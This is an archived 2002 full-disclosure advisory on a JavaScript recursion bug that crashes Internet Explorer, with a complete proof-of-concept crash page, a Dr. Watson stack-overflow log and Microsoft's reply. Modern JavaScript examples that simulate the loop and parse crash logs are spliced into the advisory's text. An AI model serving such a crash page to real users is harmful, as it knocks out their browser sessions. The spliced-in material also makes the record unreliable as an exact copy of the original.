Javascript loop causes IE to crash

From: Patrik Birgersson (patrik.birgerssonat_private)
Date: Mon Mar 18 2002 - 10:36:46 PST


    == VULNERABILITY REPORT ==
    
    Author:     Patrik Birgersson
    Object:     Microsoft Internet Explorer
    Remote:     Yes
    Local:      Yes
    
    
    Confirmed vulnerable configurations:
    IE 6    + Windows XP Professional
    IE 6    + Windows 2000 Professional SP2
    IE 5.5  + Windows 2000 Professional SP2 + Pre SP3 patches
    IE 5.01 + Windows 2000 Professional SP2 + Pre SP3 patches
    IE 5.01 + Windows NT 4 Workstation SP4
    
    Probably other configurations are vulnerable too.
    
    
    -= SYNOPSIS =-
    
    IE contains a flaw in its JavaScript handling that makes it possible to
    crash all IE windows running in the same process.
    
    The impact is not very heavy, but more of a principal nature, since I
    believe that a web page: 1) shouldn't be able to crash the browser and
    2) even if closing its own window(s), shouldn't be able to affect other
    browser windows.
    
    
    -= DETAILS =-
    
    If IE loads a web page whose JavaScript calls location.replace and then
    calls itself again, producing an unbounded recursive loop, IE will crash
    and close all IE windows running in the same process.
    
    Here's the example code:
    
    <html>
    <head>
    <script language="JavaScript">
    <!--
    // Navigates to the current URL and then calls itself again with no exit
    // condition, so the recursion never unwinds and the thread's stack is
    // exhausted.
    function crashme () {
      var url = document.location
      if (document.images) {
        // document.images exists in the same browser generation that
        // supports location.replace (replace the current history entry)
        location.replace(url);
      } else {
        location.href = url;     // fallback for older browsers
      }
      crashme ()                 // unconditional self-call: the loop
    }
    -->
    </script>
    </head>
    <body onLoad="crashme ()">
    <center>
    <h3>IE Javascript Crash Test</h3>
    </center>
    </body>
    </html>
    
    If this code is sent to the browser for execution, either served from a
    web server or opened as a local file, IE will crash.
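The following is an added example, not code from the advisory or from Microsoft. It reproduces the advisory's redirect-then-recurse pattern against a constructed stand-in for the browser's location object so it can run under Node.js, and shows two things the advisory does not: a modern engine turns the unbounded recursion into a catchable RangeError instead of letting the process hit the stack guard page, and the same redirect written as a one-shot action (or with an explicit depth guard) never grows the stack at all. The fake location object, the URLs, and the function names are all assumptions made for the example.

```javascript
'use strict';

// Constructed stand-in for the browser's `location` object so the example
// runs outside a browser; it only records what a real navigation would do.
function makeFakeLocation(href) {
  const navigations = [];
  return {
    href,
    navigations,
    replace(url) {
      this.href = String(url);
      navigations.push(this.href);
    },
  };
}

// The advisory's pattern: navigate, then call yourself again with no exit
// condition. Each call adds a stack frame and none of them ever returns.
function unboundedRedirect(location, state) {
  state.depth += 1;
  location.replace(location.href);
  unboundedRedirect(location, state);
}

// Run the unbounded pattern under try/catch. V8 enforces a call-stack
// limit and throws RangeError ("Maximum call stack size exceeded"), so the
// script fails but the process survives; IE 5/6 in 2002 instead reached the
// guard page and died with STATUS_STACK_OVERFLOW.
function runUnbounded() {
  const location = makeFakeLocation('http://example.invalid/loop');
  const state = { depth: 0 };
  try {
    unboundedRedirect(location, state);
    return { threw: false, errorName: null, depth: state.depth };
  } catch (err) {
    return { threw: true, errorName: err.name, depth: state.depth };
  }
}

// Hardened form: a redirect is a one-shot action. Navigate once and return,
// so control goes back to the browser and no recursion happens.
function redirectOnce(location, target) {
  if (location.href === target) return false; // already there: nothing to do
  location.replace(target);
  return true;
}

// If recursion is genuinely wanted, bound it explicitly so the failure mode
// is a returned depth rather than an exhausted stack.
function guardedRedirect(location, state, maxDepth) {
  if (state.depth >= maxDepth) return state.depth; // guard: stop recursing
  state.depth += 1;
  location.replace(location.href);
  return guardedRedirect(location, state, maxDepth);
}

// Stand-alone run: show how deep the unbounded version got before the
// engine stopped it, then the two safe variants.
const outcome = runUnbounded();
console.log('unbounded:', outcome);
const loc = makeFakeLocation('http://example.invalid/a');
console.log('redirectOnce:', redirectOnce(loc, 'http://example.invalid/b'), loc.navigations);
console.log('guardedRedirect depth:', guardedRedirect(makeFakeLocation('http://example.invalid/c'), { depth: 0 }, 50));
```

The depth reported by runUnbounded depends on the engine's stack limit and is in the thousands on a default Node.js build; the point is that it is finite and reported as an exception, which is the behaviour the advisory says IE lacked.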
    
    On WinXP and WinNT4 IE dies quietly and does not leave any trace of the
    incident, neither in the Event Log nor in Dr. Watson.
    
    On Win2k however, Dr. Watson is invoked and records the crash as a stack
    overflow. Below is a snippet from the Dr. Watson log created from this
    incident (line wrapping may occur).
    
    Application exception occurred:
            App: iexplore.exe (pid=808)
            When: 2/3/2002 @ 17:20:31.934
            Exception number: c00000fd (stack overflow)
    
    <- snip ->
    
    State Dump for Thread Id 0x294
    
    eax=000332a8 ebx=00000000 ecx=0000009a edx=00033288 esi=0000021a
    edi=0000020a eip=77fcb12d esp=00033000 ebp=00033014 iopl=0 nv up ei pl nz
    na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202
    
    
    function: RtlAllocateHeap
            77fcb10f 55               push    ebp
            77fcb110 8bec             mov     ebp,esp
            77fcb112 6aff             push    0xff
            77fcb114 688026f877       push    0x77f82680
            77fcb119 68a79dfb77       push    0x77fb9da7
            77fcb11e 64a100000000     mov     eax,fs:[00000000]         fs:00000000=????????
            77fcb124 50               push    eax
            77fcb125 64892500000000   mov     fs:[00000000],esp         fs:00000000=????????
            77fcb12c 51               push    ecx
    FAULT ->77fcb12d 51               push    ecx
            77fcb12e 81ec74010000     sub     esp,0x174
            77fcb134 53               push    ebx
            77fcb135 56               push    esi
            77fcb136 57               push    edi
            77fcb137 8b7d08           mov     edi,[ebp+0x8]             ss:00b105e6=????????
            77fcb13a 897da4           mov     [ebp+0xa4],edi            ss:00b105e6=????????
            77fcb13d 8065b800         and     byte ptr [ebp+0xb8],0x0   ss:00b105e6=??
            77fcb141 8b450c           mov     eax,[ebp+0xc]             ss:00b105e6=????????
            77fcb144 0b4710           or      eax,[edi+0x10]            ds:00add7dc=????????
            77fcb147 89450c           mov     [ebp+0xc],eax             ss:00b105e6=????????
            77fcb14a a9600f037d       test    eax,0x7d030f60
    
    
    <- snip ->
    
    However, from what I have been able to conclude, this stack overflow is
    not exploitable.
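As an added example (not part of the advisory), the following parser pulls the triage-relevant fields out of a Dr. Watson log of the kind quoted above, using the advisory's own snippet as embedded sample input. It extracts the process, pid, timestamp, exception code, faulting thread, eip/esp and the instruction marked FAULT, maps the exception code to its NTSTATUS name, and cross-checks that eip matches the FAULT address. The exception-name table is limited to three well-known codes and the field names are choices made for this example.

```javascript
'use strict';

// Sample input: the Dr. Watson header, register line and fault line quoted
// in the advisory, embedded here so the parser runs offline.
const SAMPLE_LOG = `Application exception occurred:
        App: iexplore.exe (pid=808)
        When: 2/3/2002 @ 17:20:31.934
        Exception number: c00000fd (stack overflow)

State Dump for Thread Id 0x294

eax=000332a8 ebx=00000000 ecx=0000009a edx=00033288 esi=0000021a
edi=0000020a eip=77fcb12d esp=00033000 ebp=00033014 iopl=0 nv up ei pl nz

function: RtlAllocateHeap
        77fcb12c 51               push    ecx
FAULT ->77fcb12d 51               push    ecx
`;

// NTSTATUS codes that matter when triaging a browser crash report.
const KNOWN_EXCEPTIONS = {
  c00000fd: 'STATUS_STACK_OVERFLOW',
  c0000005: 'STATUS_ACCESS_VIOLATION',
  c0000374: 'STATUS_HEAP_CORRUPTION',
};

// Parse one Dr. Watson report into a flat record. Missing fields are null
// rather than throwing, because real logs are frequently truncated.
function parseDrWatson(text) {
  const get = (re) => { const m = text.match(re); return m ? m[1] : null; };
  const record = {
    app: get(/^\s*App:\s+(\S+)/m),
    pid: Number(get(/\(pid=(\d+)\)/)),
    when: get(/^\s*When:\s+(.+)$/m),
    exceptionCode: get(/Exception number:\s+([0-9a-f]{8})/i),
    threadId: get(/Thread Id (0x[0-9a-f]+)/i),
    eip: get(/\beip=([0-9a-f]{8})/i),
    esp: get(/\besp=([0-9a-f]{8})/i),
    faultingFunction: get(/^function:\s+(\S+)/m),
    faultAddress: get(/^FAULT ->([0-9a-f]{8})/m),
  };
  record.exceptionName =
    KNOWN_EXCEPTIONS[(record.exceptionCode || '').toLowerCase()] || 'UNKNOWN';
  // Cross-check: the instruction Dr. Watson marks as FAULT should be the
  // one eip points at; a mismatch usually means a mangled or partial log.
  record.consistent = record.eip !== null && record.eip === record.faultAddress;
  return record;
}

// Stand-alone run over the embedded sample.
console.log(parseDrWatson(SAMPLE_LOG));
```

For the advisory's snippet the record comes back with exceptionName STATUS_STACK_OVERFLOW, faultingFunction RtlAllocateHeap and consistent true, which is the signature of a thread that exhausted its stack inside a perfectly ordinary library call rather than a fault at attacker-influenced data.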
    
    
    
    -= VENDOR INFORMATION =-
    
    Microsoft was informed about this issue on Feb 8 2002.
    After some mail exchanging between the Microsoft Security Response Center
    and me, Microsoft finally stated this:
    
    In terms of the definition of a security vulnerability which we discuss
    at http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp
    crashing a browser would not be regarded as a security vulnerability.
    
    
    -= CREDITS =-
    
    * Marcus Hufvudsson for additional investigation about this issue.
    * All of you who believe in full disclosure.
    



    This archive was generated by hypermail 2b30 : Tue Mar 19 2002 - 19:22:00 PST